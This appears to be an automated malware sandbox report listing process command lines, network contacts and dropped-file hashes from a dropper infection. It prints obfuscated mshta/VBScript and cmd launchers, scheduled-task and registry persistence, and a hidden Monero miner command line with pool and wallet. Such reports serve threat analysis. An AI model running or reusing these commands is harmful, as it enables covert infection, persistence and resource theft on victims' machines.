C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1860 -ip 1860

C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp" /SL5="$90252,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 744

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2220 -ip 2220

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 184 -ip 184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 1660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 1020

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\

C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE

..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u

C:\Windows\SysWOW64\taskkill.exe

taskkill -f /Im "sfx_123_206.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 844

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1860 -ip 1860

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 972

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1860 -ip 1860

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1036

C:\Windows\SysWOW64\control.exe

control ..\kZ_AmsXL.6G

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 623D34B2B022F91A49405EE1160A6200 C

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1664

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\64042477274.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\38777644794.exe" /mix

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\32748471338.exe" /mix

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 2056

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1804

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" AI_EUIMSI=1 APPDIR="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner" SECONDSEQUENCE="1" CLIENTPROCESSID="3956" CHAINERUIPROCESSID="3956Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature,RequiredApplication_1" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_PREREQFILES="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner%20Installation.exe" AI_PREREQDIRS="C:\Users\Admin\AppData\Roaming\Cleaner" AI_MISSING_PREREQS="Required Application" AI_DETECTED_INTERNET_CONNECTION="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733151003 " TARGETDIR="C:\" AI_INSTALL="1" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 10EEC0538907FA21A386C6467DA73E10

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4940 -ip 4940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 488

C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe

"C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5036 -ip 5036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 780

C:\Users\Admin\AppData\Local\Temp\e59da68.exe

"C:\Users\Admin\AppData\Local\Temp\e59da68.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 564 -ip 564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 780

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 onepremiumstore.bar udp
US 8.8.8.8:53 premium-s0ftwar3875.bar udp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 c.pki.goog udp
US 172.67.74.161:443 iplogger.org tcp
GB 142.250.178.3:80 c.pki.goog tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 mas.to udp
US 172.67.166.96:443 mas.to tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 abgtt.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 96.166.67.172.in-addr.arpa udp
RU 185.215.113.25:80 185.215.113.25 tcp
RU 185.215.113.25:80 185.215.113.25 tcp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 25.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 133.66.101.151.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 gcl-page.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 paybiz.herokuapp.com udp
US 34.201.81.34:443 paybiz.herokuapp.com tcp
UA 194.145.227.161:80 194.145.227.161 tcp
US 8.8.8.8:53 34.81.201.34.in-addr.arpa udp
US 8.8.8.8:53 16.23.32.13.in-addr.arpa udp
US 8.8.8.8:53 161.227.145.194.in-addr.arpa udp
US 8.8.8.8:53 41.38.245.18.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ocsp.r2m03.amazontrust.com udp
DE 13.224.191.223:80 ocsp.r2m03.amazontrust.com tcp
US 8.8.8.8:53 223.191.224.13.in-addr.arpa udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 gcl-page.biz udp
US 172.67.74.161:80 iplogger.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 34.201.81.34:443 paybiz.herokuapp.com tcp
US 8.8.8.8:53 s3.us-central-1.wasabisys.com udp
US 38.91.42.101:443 s3.us-central-1.wasabisys.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 101.42.91.38.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 paybiz.herokuapp.com udp
US 54.208.186.182:443 paybiz.herokuapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 182.186.208.54.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 34.201.81.34:443 paybiz.herokuapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.61.114:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 162.19.224.121:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 114.61.15.51.in-addr.arpa udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 121.224.19.162.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 72.84.118.132:8080 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

memory/1548-0-0x000000007456E000-0x000000007456F000-memory.dmp

memory/1548-1-0x0000000000E90000-0x000000000161E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe

MD5 568eaf0936546f3a4d478f0c249a68ff
SHA1 9e1a778d77d10955e7dc5af123c26e839b253838
SHA256 623f08634b1a481b993c2c222f9cf1c87332d946ec7ebc6e2a49ea580f3502de
SHA512 ffc5d1b53dbd7deaeded67a78810b9ffe2bf6a08307f79f0430cb9c4abc5df55fe01f35d33ec3d84b51de3e4bfed3e387eddc38198c0eaf34115edfacaaf98a9

memory/4524-17-0x00007FF909133000-0x00007FF909135000-memory.dmp

memory/4524-19-0x0000000000BF0000-0x0000000000C00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe

MD5 72f96cfde8a3c2abd3f38d8da2cfe889
SHA1 72bbf2efd229601d52cce10cfd34fa4229520291
SHA256 5b1568f481160da68223eeddcc201b3b0d03b9dddc85e4494e92ee6e919ce10d
SHA512 36e01f7216d9a5140c28350f95e7bffbfdb57d6a9b00b1e3df88587da9fcd772ac64edf021875e284039e21aaefaf7ec3595899cacfc8396933997e19fd734b9

C:\Users\Admin\AppData\Local\Temp\inst001.exe

MD5 23bcdc132d1f2aaf8d248b6a5bd21801
SHA1 2153acec77f4a57c621a3e38d523eb6df9b29134
SHA256 a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b
SHA512 d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db

C:\Users\Admin\AppData\Local\Temp\install.exe

MD5 28fc3ef97675adb779a68c89e098e7ba
SHA1 4c8e04317d41426963a310230adb77c7c5ad67fd
SHA256 06fe5043a987831fcb4bb914b6bc939740f363f920d5145f3cd697a300e1c64d
SHA512 9355b28f9ce31da2afa2b5676b52032b92c5201c09cd506eadf89c9237f6114c13c0e0cac1fa65fff1ca6cf3c4165bbc148f1a13494ab3d59ba90fea354766ec

memory/100-53-0x000000007456E000-0x000000007456F000-memory.dmp

memory/100-46-0x00000000004E0000-0x00000000004F8000-memory.dmp

memory/816-58-0x0000000000010000-0x0000000000051000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 90cfe790d93388738929453e0b8a976e
SHA1 0b8dd0ae4070259991b0de105ec3390afbb2fb44
SHA256 2ded24319d6e74ee1b9ad2517fbfd1ceceeca9b854d34b722481cbc694270831
SHA512 2a9b0fd6a3fe152f8cd5cb02703be679918949a9bbc86f90cd4cdb8bd68cee716561a80541a4620a20f034d04eef8e5ec9edae2c1969c45ab1fd03fc616e7162

memory/3608-72-0x0000000000FB0000-0x0000000000FF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7.exe

MD5 6a16fdad888507df0b938dd3421cc7cf
SHA1 d60d3a5959349f1df9e83292003e547828535ea3
SHA256 1bad2fb46b08904f12a4ea96ce3cf0582f9995c16a26143c16b858702793e166
SHA512 c6877e5b5b58730e188b441a67099605d2c6ae5dd94b2a0281534771555a09d144f952878e4ade462f33604e96a7f66dab5f18689b72d4ff589952784e1f9e16

memory/100-73-0x0000000002890000-0x0000000002896000-memory.dmp

memory/816-63-0x0000000000010000-0x0000000000051000-memory.dmp

memory/816-61-0x0000000000010000-0x0000000000051000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv

MD5 9dabbd84d79a0330f7635748177a2d93
SHA1 73a4e520d772e4260651cb20b61ba4cb9a29635a
SHA256 a6e4be06d34448f4efa8655a3ae6e294c98ae4cb42f7c3da3be06b419fa8389d
SHA512 020114ba08ccb7ad7934e2046d2b61ebd1b006b8c31194f2cfb49ff4397f4db35dc67c8191552346d04709dee4871a13797cf284ef543e7280bc390a6746a314

memory/1960-88-0x0000000000C00000-0x0000000000C08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe

MD5 f39dd2806d71830979a3110eb9a0ae44
SHA1 fd94b99664d85eede48ab22f27054ab5cc6dd2d3
SHA256 c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213
SHA512 ffc5a57fa4982a425e1bb2077affba0113d92365ad6eae849e9d700ee99615128c965de3705d2f2a12c1b46230ef2fc1820e4b74b8a3938b1b7211a228db9e82

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 662af94a73a6350daea7dcbe5c8dfd38
SHA1 7ab3ddd6e3cf8aaa7fa2c4fa7856bb83ea6a442c
SHA256 df0b82e8877857057a9b64b73281099f723ae74b1353cf216ca11ba6b20b3ef8
SHA512 d864c483bfb74479c90ea38a46fe6cd3d628a8b13bd38acde4ccce3258ec290e5389fe920a4351dadb7fd23f87cd461ecf253c5d926f8277e518a7b5029f583a

memory/184-108-0x0000000000CB0000-0x0000000000DB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
